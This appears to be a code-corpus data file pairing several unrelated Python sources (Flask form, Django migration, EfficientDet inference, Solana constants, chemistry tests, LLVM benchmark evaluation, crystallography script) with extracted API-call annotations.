'lib.setAttr', (['shader', 'dx2sfxAttr[attr]', 'textureDir'], {}), 
'(shader, dx2sfxAttr[attr], textureDir)\n', (12042, 12080), True, 'import coopLib as lib\n'), ((17266, 17390), 'maya.cmds.playblast', 'cmds.playblast', ([], {'f': 'saveDir', 'format': '"""avi"""', 'w': 'width', 'h': 'height', 'percent': '(100)', 'qlt': '(100)', 'v': '(True)', 'fo': '(True)', 'os': '(True)', 's': 'audioNode'}), "(f=saveDir, format='avi', w=width, h=height, percent=100, qlt\n =100, v=True, fo=True, os=True, s=audioNode)\n", (17280, 17390), True, 'import maya.cmds as cmds\n'), ((19130, 19175), 'maya.cmds.error', 'cmds.error', (['"""Frame capture cancelled by user"""'], {}), "('Frame capture cancelled by user')\n", (19140, 19175), True, 'import maya.cmds as cmds\n'), ((17454, 17554), 'maya.cmds.error', 'cmds.error', (['"""Video cannot be playblasted as qt or avi, please check the installed codecs."""'], {}), "(\n 'Video cannot be playblasted as qt or avi, please check the installed codecs.'\n )\n", (17464, 17554), True, 'import maya.cmds as cmds\n')] |
# blogs_posts/forms.py
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField
from wtforms.validators import DataRequired
class BlogPostForm(FlaskForm):
    """Form for creating a blog post.

    Fields:
        title: required post title.
        text: required post body.
        submit: submit button labelled "Post".
    """

    title = StringField("Title", validators=[DataRequired()])
    text = TextAreaField("Text", validators=[DataRequired()])
    submit = SubmitField("Post")
| [
"wtforms.validators.DataRequired",
"wtforms.SubmitField"
] | [((330, 349), 'wtforms.SubmitField', 'SubmitField', (['"""Post"""'], {}), "('Post')\n", (341, 349), False, 'from wtforms import StringField, TextAreaField, SubmitField\n'), ((238, 252), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (250, 252), False, 'from wtforms.validators import DataRequired\n'), ((300, 314), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (312, 314), False, 'from wtforms.validators import DataRequired\n')] |
# Generated by Django 3.1.7 on 2021-02-26 08:07
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the blog app: Category, Tag and Post models."""

    # First migration of the app, so nothing to depend on.
    initial = True

    dependencies = [
    ]

    operations = [
        # Lookup table of unique category names.
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, null=True, unique=True)),
            ],
        ),
        # Free-form tags, attached to posts via a many-to-many relation below.
        migrations.CreateModel(
            name='Tag',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255, null=True, unique=True)),
            ],
        ),
        # Blog posts: timestamped, optionally categorised (FK) and tagged (M2M).
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, null=True)),
                # NOTE(review): 'updated' uses auto_now_add, so it is set once at
                # creation and never refreshed on save — auto_now was likely
                # intended; confirm against the model definition.
                ('updated', models.DateTimeField(auto_now_add=True, null=True)),
                ('title', models.CharField(max_length=255, null=True)),
                ('body', models.TextField(blank=True, null=True)),
                ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='blog.category')),
                ('tag', models.ManyToManyField(blank=True, to='blog.Tag')),
            ],
        ),
    ]
| [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.ManyToManyField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((337, 430), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (353, 430), False, 'from django.db import migrations, models\n'), ((454, 510), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'null': '(True)', 'unique': '(True)'}), '(max_length=255, null=True, unique=True)\n', (470, 510), False, 'from django.db import migrations, models\n'), ((639, 732), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (655, 732), False, 'from django.db import migrations, models\n'), ((756, 812), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'null': '(True)', 'unique': '(True)'}), '(max_length=255, null=True, unique=True)\n', (772, 812), False, 'from django.db import migrations, models\n'), ((942, 1035), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (958, 1035), False, 'from django.db import migrations, models\n'), ((1062, 1112), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'null': '(True)'}), '(auto_now_add=True, null=True)\n', (1082, 1112), False, 'from django.db import migrations, models\n'), ((1143, 1193), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'null': '(True)'}), '(auto_now_add=True, null=True)\n', (1163, 1193), False, 'from django.db import migrations, models\n'), ((1222, 1265), 'django.db.models.CharField', 'models.CharField', ([], 
{'max_length': '(255)', 'null': '(True)'}), '(max_length=255, null=True)\n', (1238, 1265), False, 'from django.db import migrations, models\n'), ((1293, 1332), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (1309, 1332), False, 'from django.db import migrations, models\n'), ((1364, 1461), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""blog.category"""'}), "(null=True, on_delete=django.db.models.deletion.CASCADE,\n to='blog.category')\n", (1381, 1461), False, 'from django.db import migrations, models\n'), ((1484, 1533), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'blank': '(True)', 'to': '"""blog.Tag"""'}), "(blank=True, to='blog.Tag')\n", (1506, 1533), False, 'from django.db import migrations, models\n')] |
from model import efficientdet
import cv2
import os
import numpy as np
import time
from utils import preprocess_image
from utils.anchors import anchors_for_shape
from utils.draw_boxes import draw_boxes
from utils.post_process_boxes import post_process_boxes
def main(image_path='datasets/VOC2007/JPEGImages/000002.jpg',
         model_path='checkpoints/2019-12-03/pascal_05_0.6283_1.1975_0.8029.h5',
         phi=1,
         score_threshold=0.5):
    """Run EfficientDet inference on a single image and display the detections.

    The image path, weights path, scaling coefficient and confidence
    threshold were previously hard-coded; they are now parameters whose
    defaults are the original values, so ``main()`` behaves exactly as before.

    Args:
        image_path: image file to run detection on.
        model_path: trained ``.h5`` weights file, loaded by layer name.
        phi: EfficientDet compound-scaling coefficient (0-6); selects the
            square input resolution from ``image_sizes``.
        score_threshold: minimum confidence for a detection to be kept.
    """
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    weighted_bifpn = False
    # Input resolution for each phi (D0..D6).
    image_sizes = (512, 640, 768, 896, 1024, 1280, 1408)
    image_size = image_sizes[phi]
    # PASCAL VOC class names; order must match the label map used in training.
    classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',
               'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
    num_classes = len(classes)
    # One random colour per class for drawing boxes.
    colors = [np.random.randint(0, 256, 3).tolist() for _ in range(num_classes)]
    model, prediction_model = efficientdet(phi=phi,
                                       weighted_bifpn=weighted_bifpn,
                                       num_classes=num_classes,
                                       score_threshold=score_threshold)
    prediction_model.load_weights(model_path, by_name=True)

    image = cv2.imread(image_path)
    src_image = image.copy()
    # BGR -> RGB for the network; the BGR copy is kept for OpenCV drawing.
    image = image[:, :, ::-1]
    h, w = image.shape[:2]

    image, scale, offset_h, offset_w = preprocess_image(image, image_size=image_size)
    anchors = anchors_for_shape((image_size, image_size))

    # run network
    start = time.time()
    boxes, scores, labels = prediction_model.predict_on_batch([np.expand_dims(image, axis=0),
                                                               np.expand_dims(anchors, axis=0)])
    boxes, scores, labels = np.squeeze(boxes), np.squeeze(scores), np.squeeze(labels)
    print(time.time() - start)

    # Map boxes back from network input space to the original image size.
    boxes = post_process_boxes(boxes=boxes,
                               scale=scale,
                               offset_h=offset_h,
                               offset_w=offset_w,
                               height=h,
                               width=w)

    # select indices which have a score above the threshold
    indices = np.where(scores[:] > score_threshold)[0]

    # select those detections
    boxes = boxes[indices]
    labels = labels[indices]

    draw_boxes(src_image, boxes, scores, labels, colors, classes)

    cv2.namedWindow('image', cv2.WINDOW_NORMAL)
    cv2.imshow('image', src_image)
    cv2.waitKey(0)


if __name__ == '__main__':
    main()
| [
"utils.preprocess_image",
"utils.anchors.anchors_for_shape",
"numpy.where",
"utils.draw_boxes.draw_boxes",
"utils.post_process_boxes.post_process_boxes",
"cv2.imshow",
"numpy.squeeze",
"cv2.waitKey",
"numpy.random.randint",
"model.efficientdet",
"numpy.expand_dims",
"time.time",
"cv2.namedWi... | [((921, 1036), 'model.efficientdet', 'efficientdet', ([], {'phi': 'phi', 'weighted_bifpn': 'weighted_bifpn', 'num_classes': 'num_classes', 'score_threshold': 'score_threshold'}), '(phi=phi, weighted_bifpn=weighted_bifpn, num_classes=\n num_classes, score_threshold=score_threshold)\n', (933, 1036), False, 'from model import efficientdet\n'), ((1296, 1318), 'cv2.imread', 'cv2.imread', (['image_path'], {}), '(image_path)\n', (1306, 1318), False, 'import cv2\n'), ((1449, 1495), 'utils.preprocess_image', 'preprocess_image', (['image'], {'image_size': 'image_size'}), '(image, image_size=image_size)\n', (1465, 1495), False, 'from utils import preprocess_image\n'), ((1510, 1553), 'utils.anchors.anchors_for_shape', 'anchors_for_shape', (['(image_size, image_size)'], {}), '((image_size, image_size))\n', (1527, 1553), False, 'from utils.anchors import anchors_for_shape\n'), ((1589, 1600), 'time.time', 'time.time', ([], {}), '()\n', (1598, 1600), False, 'import time\n'), ((1921, 2027), 'utils.post_process_boxes.post_process_boxes', 'post_process_boxes', ([], {'boxes': 'boxes', 'scale': 'scale', 'offset_h': 'offset_h', 'offset_w': 'offset_w', 'height': 'h', 'width': 'w'}), '(boxes=boxes, scale=scale, offset_h=offset_h, offset_w=\n offset_w, height=h, width=w)\n', (1939, 2027), False, 'from utils.post_process_boxes import post_process_boxes\n'), ((2398, 2459), 'utils.draw_boxes.draw_boxes', 'draw_boxes', (['src_image', 'boxes', 'scores', 'labels', 'colors', 'classes'], {}), '(src_image, boxes, scores, labels, colors, classes)\n', (2408, 2459), False, 'from utils.draw_boxes import draw_boxes\n'), ((2469, 2512), 'cv2.namedWindow', 'cv2.namedWindow', (['"""image"""', 'cv2.WINDOW_NORMAL'], {}), "('image', cv2.WINDOW_NORMAL)\n", (2484, 2512), False, 'import cv2\n'), ((2517, 2547), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'src_image'], {}), "('image', src_image)\n", (2527, 2547), False, 'import cv2\n'), ((2552, 2566), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), 
'(0)\n', (2563, 2566), False, 'import cv2\n'), ((1820, 1837), 'numpy.squeeze', 'np.squeeze', (['boxes'], {}), '(boxes)\n', (1830, 1837), True, 'import numpy as np\n'), ((1839, 1857), 'numpy.squeeze', 'np.squeeze', (['scores'], {}), '(scores)\n', (1849, 1857), True, 'import numpy as np\n'), ((1859, 1877), 'numpy.squeeze', 'np.squeeze', (['labels'], {}), '(labels)\n', (1869, 1877), True, 'import numpy as np\n'), ((2257, 2294), 'numpy.where', 'np.where', (['(scores[:] > score_threshold)'], {}), '(scores[:] > score_threshold)\n', (2265, 2294), True, 'import numpy as np\n'), ((1664, 1693), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (1678, 1693), True, 'import numpy as np\n'), ((1758, 1789), 'numpy.expand_dims', 'np.expand_dims', (['anchors'], {'axis': '(0)'}), '(anchors, axis=0)\n', (1772, 1789), True, 'import numpy as np\n'), ((1888, 1899), 'time.time', 'time.time', ([], {}), '()\n', (1897, 1899), False, 'import time\n'), ((824, 852), 'numpy.random.randint', 'np.random.randint', (['(0)', '(256)', '(3)'], {}), '(0, 256, 3)\n', (841, 852), True, 'import numpy as np\n')] |
"""Stake Program Constants."""
from solana.publickey import PublicKey
STAKE_PROGRAM_ID: PublicKey = PublicKey("Stake11111111111111111111111111111111111111")
"""Public key that identifies the Stake program."""
SYSVAR_STAKE_CONFIG_ID: PublicKey = PublicKey("StakeConfig11111111111111111111111111111111")
"""Public key that identifies the Stake config sysvar."""
STAKE_LEN: int = 200
"""Size of stake account."""
LAMPORTS_PER_SOL: int = 1_000_000_000
"""Number of lamports per SOL"""
MINIMUM_DELEGATION: int = LAMPORTS_PER_SOL
"""Minimum delegation allowed by the stake program"""
| [
"solana.publickey.PublicKey"
] | [((102, 158), 'solana.publickey.PublicKey', 'PublicKey', (['"""Stake11111111111111111111111111111111111111"""'], {}), "('Stake11111111111111111111111111111111111111')\n", (111, 158), False, 'from solana.publickey import PublicKey\n'), ((248, 304), 'solana.publickey.PublicKey', 'PublicKey', (['"""StakeConfig11111111111111111111111111111111"""'], {}), "('StakeConfig11111111111111111111111111111111')\n", (257, 304), False, 'from solana.publickey import PublicKey\n')] |
import pytest
from rdkit import Chem
from aizynthfinder.chem import MoleculeException, Molecule
def test_no_input():
    """Creating a Molecule with neither rd_mol nor smiles must fail."""
    pytest.raises(MoleculeException, Molecule)
def test_create_with_mol():
    """A Molecule built from an RDKit mol round-trips its SMILES."""
    water = Molecule(rd_mol=Chem.MolFromSmiles("O"))
    assert water.smiles == "O"
def test_create_with_smiles():
    """A Molecule built from SMILES exposes an equivalent RDKit mol."""
    rd_mol = Molecule(smiles="O").rd_mol
    assert Chem.MolToSmiles(rd_mol) == "O"
def test_inchi():
    """The InChI string of water is computed correctly."""
    water = Molecule(smiles="O")
    assert water.inchi == "InChI=1S/H2O/h1H2"
def test_inchi_key():
    """The InChIKey of water is computed correctly.

    The expected literal had been replaced by the placeholder "<KEY>"
    (dataset anonymization), which made the assertion unsatisfiable; it is
    restored to the standard InChIKey of water.
    """
    mol = Molecule(smiles="O")
    assert mol.inchi_key == "XLYOFNOQVPJJNP-UHFFFAOYSA-N"
def test_fingerprint():
    """Water's Morgan fingerprint has exactly one set bit, at any length."""
    water = Molecule(smiles="O")
    for args in ((2,), (2, 10)):
        assert sum(water.fingerprint(*args)) == 1
def test_sanitize():
    """Sanitization succeeds eagerly on valid input, raises or repairs on bad input."""
    water = Molecule(smiles="O", sanitize=True)
    assert Chem.MolToSmiles(water.rd_mol) == "O"

    broken = Molecule(smiles="c1ccccc1(C)(C)")
    # Explicit sanitization of an invalid structure raises by default...
    with pytest.raises(MoleculeException):
        broken.sanitize()
    # ...but can repair in place when exceptions are suppressed.
    broken.sanitize(raise_exception=False)
    assert broken.smiles == "CC1(C)CCCCC1"
def test_equality():
    """Equality is canonical: the same molecule written two ways compares equal."""
    assert Molecule(smiles="CCCCO") == Molecule(smiles="OCCCC")
def test_basic_equality():
    """Enantiomers differ under full equality but match under basic comparison."""
    r_form = Molecule(smiles="CC[C@@H](C)O")  # R-2-butanol
    s_form = Molecule(smiles="CC[C@H](C)O")  # S-2-butanol
    assert r_form != s_form
    assert r_form.basic_compare(s_form)
def test_has_atom_mapping():
    """has_atom_mapping() detects atom-map numbers in the SMILES."""
    plain = Molecule(smiles="CCCCO")
    mapped = Molecule(smiles="C[C:5]CCO")
    assert not plain.has_atom_mapping()
    assert mapped.has_atom_mapping()
def test_remove_atom_mapping():
mol = Molecule(smiles="C[C:5]CCO")
assert mol.has_atom_mapping()
mol.remove_atom_mapping()
assert not mol.has_atom_mapping()
| [
"aizynthfinder.chem.Molecule",
"rdkit.Chem.MolFromSmiles",
"rdkit.Chem.MolToSmiles",
"pytest.raises"
] | [((225, 248), 'rdkit.Chem.MolFromSmiles', 'Chem.MolFromSmiles', (['"""O"""'], {}), "('O')\n", (243, 248), False, 'from rdkit import Chem\n'), ((260, 283), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'rd_mol': 'rd_mol'}), '(rd_mol=rd_mol)\n', (268, 283), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((357, 377), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""'}), "(smiles='O')\n", (365, 377), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((456, 476), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""'}), "(smiles='O')\n", (464, 476), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((556, 576), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""'}), "(smiles='O')\n", (564, 576), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((650, 670), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""'}), "(smiles='O')\n", (658, 670), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((790, 825), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""', 'sanitize': '(True)'}), "(smiles='O', sanitize=True)\n", (798, 825), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((885, 918), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""c1ccccc1(C)(C)"""'}), "(smiles='c1ccccc1(C)(C)')\n", (893, 918), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1101, 1125), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""CCCCO"""'}), "(smiles='CCCCO')\n", (1109, 1125), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1137, 1161), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""OCCCC"""'}), "(smiles='OCCCC')\n", (1145, 1161), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1227, 1258), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': 
'"""CC[C@@H](C)O"""'}), "(smiles='CC[C@@H](C)O')\n", (1235, 1258), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1285, 1315), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""CC[C@H](C)O"""'}), "(smiles='CC[C@H](C)O')\n", (1293, 1315), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1434, 1458), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""CCCCO"""'}), "(smiles='CCCCO')\n", (1442, 1458), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1470, 1498), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""C[C:5]CCO"""'}), "(smiles='C[C:5]CCO')\n", (1478, 1498), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1618, 1646), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""C[C:5]CCO"""'}), "(smiles='C[C:5]CCO')\n", (1626, 1646), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((129, 161), 'pytest.raises', 'pytest.raises', (['MoleculeException'], {}), '(MoleculeException)\n', (142, 161), False, 'import pytest\n'), ((171, 181), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {}), '()\n', (179, 181), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((390, 418), 'rdkit.Chem.MolToSmiles', 'Chem.MolToSmiles', (['mol.rd_mol'], {}), '(mol.rd_mol)\n', (406, 418), False, 'from rdkit import Chem\n'), ((838, 866), 'rdkit.Chem.MolToSmiles', 'Chem.MolToSmiles', (['mol.rd_mol'], {}), '(mol.rd_mol)\n', (854, 866), False, 'from rdkit import Chem\n'), ((929, 961), 'pytest.raises', 'pytest.raises', (['MoleculeException'], {}), '(MoleculeException)\n', (942, 961), False, 'import pytest\n')] |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import json
from typing import Any, Dict
from .imports import FileImport
class Config:
def __init__(self, default_version_metadata: Dict[str, Any]):
self.credential = default_version_metadata["config"]["credential"]
self.credential_scopes = default_version_metadata["config"]["credential_scopes"]
self.credential_default_policy_type = default_version_metadata["config"]["credential_default_policy_type"]
self.credential_default_policy_type_has_async_version = (
default_version_metadata["config"]["credential_default_policy_type_has_async_version"]
)
self.credential_key_header_name = default_version_metadata["config"]["credential_key_header_name"]
self.default_version_metadata = default_version_metadata
def imports(self, async_mode: bool) -> FileImport:
imports_to_load = "async_imports" if async_mode else "sync_imports"
return FileImport(json.loads(self.default_version_metadata['config'][imports_to_load]))
| [
"json.loads"
] | [((1248, 1316), 'json.loads', 'json.loads', (["self.default_version_metadata['config'][imports_to_load]"], {}), "(self.default_version_metadata['config'][imports_to_load])\n", (1258, 1316), False, 'import json\n')] |
import tensorflow as tf
def sum():
return tf.ones([2,2,2])
def resize_by_axis(image, dim_1, dim_2, ax):
resized_list = []
unstack_img_depth_list = tf.unstack(image, axis = ax)
for i in unstack_img_depth_list:
resized_list.append(tf.image.resize(i, [dim_1, dim_2]))
stack_img = tf.stack(resized_list, axis=ax)
return stack_img
def resize_voxel(vox,dims):
dim_1,dim_2,dim_3 = dims
resized_along_depth = resize_by_axis(vox,dim_1,dim_2,3)
resized_along_width = resize_by_axis(resized_along_depth,dim_1,dim_3,2)
return resized_along_width
# resized_along_depth = resize_by_axis(x,50,60,2, True)
# resized_along_width = resize_by_axis(resized_along_depth,50,70,1,True) | [
"tensorflow.unstack",
"tensorflow.image.resize",
"tensorflow.stack",
"tensorflow.ones"
] | [((44, 62), 'tensorflow.ones', 'tf.ones', (['[2, 2, 2]'], {}), '([2, 2, 2])\n', (51, 62), True, 'import tensorflow as tf\n'), ((151, 177), 'tensorflow.unstack', 'tf.unstack', (['image'], {'axis': 'ax'}), '(image, axis=ax)\n', (161, 177), True, 'import tensorflow as tf\n'), ((285, 316), 'tensorflow.stack', 'tf.stack', (['resized_list'], {'axis': 'ax'}), '(resized_list, axis=ax)\n', (293, 316), True, 'import tensorflow as tf\n'), ((236, 270), 'tensorflow.image.resize', 'tf.image.resize', (['i', '[dim_1, dim_2]'], {}), '(i, [dim_1, dim_2])\n', (251, 270), True, 'import tensorflow as tf\n')] |
#!/usr/bin/env python3
import os, sys, signal
import multiprocessing
import subprocess as sp
import shutil
import shlex
import psutil
import time
import csv
import json
import pytz
from datetime import datetime
import Lib as lib
sys.path.append('/home/jrchang/workspace/gym-OptClang/gym_OptClang/envs/')
import RemoteWorker as rwork
def getTargets(path):
"""
path: the root path for "test-suite" to search ".test" file
"""
prog = rwork.Programs()
AllTargetsDict = prog.getAvailablePrograms()
ListOfAvailableTarget = list(AllTargetsDict.keys())
# search all test target in Apps
AppTargets = {}
test_pattern = '.test'
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith(test_pattern):
# remove .test in the file name
file = file[:-5]
# filter out those are not in our consideration.
if file in ListOfAvailableTarget:
AppTargets[file] = root
return AppTargets
def Eval(TargetDict, WorkerID):
"""
TargetDict = {"target": "target root path"}
return BuildTimeDict = {"target": run-time}
"""
RunCyclesDict = {}
prevCwd = os.getcwd()
actor = lib.EnvResponseActor()
for target, targetRoot in TargetDict.items():
isBuilt = False
retStatus = actor.EnvEcho(target, WorkerID, TargetDict, ParallelBuild=True)
if retStatus == "Success":
# get cycles from "RecordTargetFilePath"
'''
ex.
log file format: /tmp/PredictionDaemon/worker-[n]/[BenchmarkName].usage
record path example:
/tmp/PredictionDaemon/worker-1/bmm.usage
e.g.
bmm; cpu-cycles | 5668022249; func | matmult | 0.997
'''
RecordTargetFilePath = '/tmp/PredictionDaemon/worker-' + WorkerID + '/' + target + '.usage'
with open(RecordTargetFilePath, 'r') as recFile:
info = recFile.read()
TotalCycles = info.split(';')[1].split('|')[1].strip()
RunCyclesDict[target] = int(TotalCycles)
print("Target={}, takes {} cycles".format(target, TotalCycles))
else:
RunCyclesDict[target] = -1
os.chdir(prevCwd)
return RunCyclesDict
def runEval(WorkerID, jsonPath):
"""
TargetRoot: the root path in your test-suite/build
return {"target": {key_1: first_time, key_2: second_time}}
"""
'''
# get all .test target
Targets = getTargets(TargetRoot + '/SingleSource/Benchmarks')
Targets.update(getTargets(TargetRoot + '/MultiSource/Benchmarks'))
Targets.update(getTargets(TargetRoot + '/MultiSource/Applications'))
#Targets = {"GlobalDataFlow-dbl":"/home/jrchang/workspace/llvm-thesis-inference/test-suite/build-worker-6/MultiSource/Benchmarks/TSVC/GlobalDataFlow-dbl"}
'''
# Build, verify and log run time
builder = lib.EnvBuilder()
LitTestDict = builder.CheckTestSuiteCmake(WorkerID)
retDict = Eval(LitTestDict, WorkerID)
# record as file for logging
date = datetime.now(pytz.timezone('Asia/Taipei')).strftime("%m-%d_%H-%M")
Dir = "log-" + date
os.makedirs(Dir)
with open(Dir + '/' + jsonPath, 'w') as fp:
json.dump(retDict, fp)
return retDict
def readOriginalResults():
loc = os.getenv("LLVM_THESIS_RandomHome", "Error")
loc = loc + "/LLVMTestSuiteScript/GraphGen/output/newMeasurableStdBenchmarkMeanAndSigma"
Orig_cycles_mean = {}
Orig_cycles_sigma = {}
with open(loc, 'r') as File:
'''
e.g.
PAQ8p/paq8p; cpu-cycles-mean | 153224947840; cpu-cycles-sigma | 2111212874
'''
for line in File:
elms = line.split(';')
target = elms[0].split('/')[-1]
mean = elms[1].split('|')[1].strip()
sigma = elms[2].split('|')[1].strip()
Orig_cycles_mean[target] = int(mean)
Orig_cycles_sigma[target] = int(sigma)
return Orig_cycles_mean, Orig_cycles_sigma
if __name__ == '__main__':
WorkerID = "6"
print("-------------------------------------------")
print("Make sure your $$LLVM_THESIS_HOME point to the inference one.")
print("If you would like to change worker, modify the passed args of runEval()")
print("Default WorkerID={}".format(WorkerID))
print("-------------------------------------------")
for i in range(1):
startTime = time.perf_counter()
'''
Measure the build time for ABC
'''
key_2 = "ABC"
ABC_results = runEval(WorkerID, "ABC_cycles_mean.json")
'''
If you already ran, just read the data.
'''
#ABC_results = json.load(open("ABC_cycles_mean.json"))
# read data from previous results
# we don't have to read the original data for every time
'''
Orig_cycles_mean, Orig_cycles_sigma = readOriginalResults()
with open("Orig_cycles_mean.json", 'w') as fp:
json.dump(Orig_cycles_mean, fp)
with open("Orig_cycles_sigma.json", 'w') as fp:
json.dump(Orig_cycles_sigma, fp)
'''
endTime = time.perf_counter()
print("The evaluation procedure takse:{} mins".format((endTime - startTime)/60))
| [
"pytz.timezone",
"RemoteWorker.Programs",
"os.makedirs",
"os.getenv",
"json.dump",
"time.perf_counter",
"Lib.EnvResponseActor",
"os.getcwd",
"os.chdir",
"Lib.EnvBuilder",
"sys.path.append",
"os.walk"
] | [((230, 304), 'sys.path.append', 'sys.path.append', (['"""/home/jrchang/workspace/gym-OptClang/gym_OptClang/envs/"""'], {}), "('/home/jrchang/workspace/gym-OptClang/gym_OptClang/envs/')\n", (245, 304), False, 'import os, sys, signal\n'), ((448, 464), 'RemoteWorker.Programs', 'rwork.Programs', ([], {}), '()\n', (462, 464), True, 'import RemoteWorker as rwork\n'), ((683, 696), 'os.walk', 'os.walk', (['path'], {}), '(path)\n', (690, 696), False, 'import os, sys, signal\n'), ((1215, 1226), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1224, 1226), False, 'import os, sys, signal\n'), ((1239, 1261), 'Lib.EnvResponseActor', 'lib.EnvResponseActor', ([], {}), '()\n', (1259, 1261), True, 'import Lib as lib\n'), ((2264, 2281), 'os.chdir', 'os.chdir', (['prevCwd'], {}), '(prevCwd)\n', (2272, 2281), False, 'import os, sys, signal\n'), ((2938, 2954), 'Lib.EnvBuilder', 'lib.EnvBuilder', ([], {}), '()\n', (2952, 2954), True, 'import Lib as lib\n'), ((3192, 3208), 'os.makedirs', 'os.makedirs', (['Dir'], {}), '(Dir)\n', (3203, 3208), False, 'import os, sys, signal\n'), ((3346, 3390), 'os.getenv', 'os.getenv', (['"""LLVM_THESIS_RandomHome"""', '"""Error"""'], {}), "('LLVM_THESIS_RandomHome', 'Error')\n", (3355, 3390), False, 'import os, sys, signal\n'), ((3265, 3287), 'json.dump', 'json.dump', (['retDict', 'fp'], {}), '(retDict, fp)\n', (3274, 3287), False, 'import json\n'), ((4456, 4475), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (4473, 4475), False, 'import time\n'), ((5179, 5198), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (5196, 5198), False, 'import time\n'), ((3110, 3138), 'pytz.timezone', 'pytz.timezone', (['"""Asia/Taipei"""'], {}), "('Asia/Taipei')\n", (3123, 3138), False, 'import pytz\n')] |
#!/usr/bin/env python3
import sys
sys.path.append('../..')
import numpy as np
from neml.cp import crystallography
from neml.math import rotations
import matplotlib.pyplot as plt
if __name__ == "__main__":
N = 300
orientations = rotations.random_orientations(N)
sgroup = crystallography.SymmetryGroup("432")
angles = []
for i in range(len(orientations)):
for j in range(i+1, len(orientations)):
o1 = orientations[i]
o2 = orientations[j]
m = sgroup.misorientation(o1,o2)
axis, angle = m.to_axis_angle()
angles.append(angle)
angles = np.rad2deg(angles)
plt.figure()
plt.hist(angles, bins = 30)
plt.show()
Np = N * (N-1)
orientations1 = rotations.random_orientations(Np)
orientations2 = rotations.random_orientations(Np)
mis = sgroup.misorientation_block(orientations1, orientations2)
